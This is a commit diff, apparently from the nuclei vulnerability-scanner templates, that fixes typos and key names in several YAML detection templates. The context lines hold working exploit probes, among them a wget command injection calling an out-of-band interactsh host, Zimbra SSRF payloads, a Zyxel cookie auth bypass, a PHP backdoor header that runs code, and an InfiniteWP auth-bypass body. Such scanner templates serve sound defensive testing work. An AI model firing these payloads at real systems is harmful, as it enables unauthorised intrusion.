Fixed mistakes/typos

Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84
2021-08-19 16:59:55 +03:00 · 2021-08-19 16:59:55 +03:00 · 97d4f8705b
parent f55d6b75e1
commit 97d4f8705b
12 changed files with 17 additions and 18 deletions
--- a/cves/2019/CVE-2019-0193.yaml
+++ b/cves/2019/CVE-2019-0193.yaml
@ -5,7 +5,7 @@ info:
  description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
  author: pdteam
  severity: critical
-  refrense: |
+  reference:
      - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
      - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
      - https://paper.seebug.org/1009/
--- a/cves/2019/CVE-2019-8451.yaml
+++ b/cves/2019/CVE-2019-8451.yaml
@ -20,7 +20,7 @@ requests:
      url=https://{{Hostname}}:443@{{interactsh-url}}

    headers:
-      X-Atlassian-token: no-check
+      X-Atlassian-Token: no-check
      Content-Type: application/x-www-form-urlencoded

    matchers:
--- a/cves/2020/CVE-2020-28188.yaml
+++ b/cves/2020/CVE-2020-28188.yaml
@ -16,14 +16,14 @@ requests:
      - |
        GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
        Host: {{Hostname}}
-        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive

        GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
        Host: {{Hostname}}
-        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@ -5,7 +5,7 @@ info:
  author: gy741
  severity: critical
  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
-  reference: |
+  reference:
    - https://www.adminxe.com/2183.html
  tags: cve,cve2020,zimbra,ssrf,oob

@ -14,7 +14,7 @@ requests:
      - |
        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
        Host: {{Hostname}}
-        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*

--- a/cves/2021/CVE-2021-3297.yaml
+++ b/cves/2021/CVE-2021-3297.yaml
@ -4,7 +4,7 @@ info:
  description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.
  author: gy741
  severity: high
-  reference: |
+  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3297
    - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass
  tags: cve,cve2021,zyxel,auth-bypass,router
@ -18,7 +18,7 @@ requests:
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
-        cookie: language=en; login=1
+        Cookie: language=en; login=1

    matchers-condition: and
    matchers:
--- a/network/cisco-smi-exposure.yaml
+++ b/network/cisco-smi-exposure.yaml
@ -9,7 +9,7 @@ info:
    connecting to the specified Cisco Smart Install port and determines
    if it speaks the Smart Install Protocol. Exposure of SMI to
    untrusted networks can allow complete compromise of the switch.
-  references: |
+  reference:
    - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
    - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature
    - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
--- a/technologies/mautic-crm-detect.yaml
+++ b/technologies/mautic-crm-detect.yaml
@ -14,7 +14,7 @@ requests:
    path:
      - "{{BaseURL}}/s/login"

-    matcherscondition: or
+    matchers-condition: or
    matchers:
      - type: word
        part: body
--- a/technologies/sap-web-dispatcher-admin-portal.yaml
+++ b/technologies/sap-web-dispatcher-admin-portal.yaml
@ -19,20 +19,20 @@ requests:
    matchers:
      - type: word
        part: header
-        conditions: or
+        condition: or
        words:
          - "Basic realm=\"WEB ADMIN\""
          - "SAP NetWeaver Application Server"

      - type: status
-        conditions: or
+        condition: or
        status:
          - 401
          - 200

      - type: word
        part: body
-        conditions: or
+        condition: or
        words:
          - "SAP Web Dispatcher"
          - "<title>Administration</title>"
--- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
+++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml
@ -12,7 +12,7 @@ requests:
    path:
      - "{{BaseURL}}"
    headers:
-      User-Agentt: zerodiumvar_dump(233*233);
+      User-Agent: zerodiumvar_dump(233*233);
    matchers-condition: and
    matchers:

--- a/vulnerabilities/other/sick-beard-xss.yaml
+++ b/vulnerabilities/other/sick-beard-xss.yaml
@ -8,7 +8,7 @@ info:
  reference:
    - https://sickbeard.com/ # vendor homepage
    - https://github.com/midgetspy/Sick-Beard # software link
-  customAttributes:
+  additional-fields:
    shodan-dork: sickbeard

 requests:
--- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml
+++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml
@ -4,7 +4,7 @@ info:
  name: Zimbra Collaboration Suite (ZCS) - SSRF
  author: gy741
  severity: critical
-  reference: |
+  reference:
    - https://www.adminxe.com/2183.html
  tags: zimbra,ssrf,oob

@ -13,7 +13,7 @@ requests:
      - |
        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
        Host: {{Hostname}}
-        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
--- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
@ -29,7 +29,6 @@ requests:
        Upgrade-Insecure-Requests: 1
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
-        ContentLength: 3537

        _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}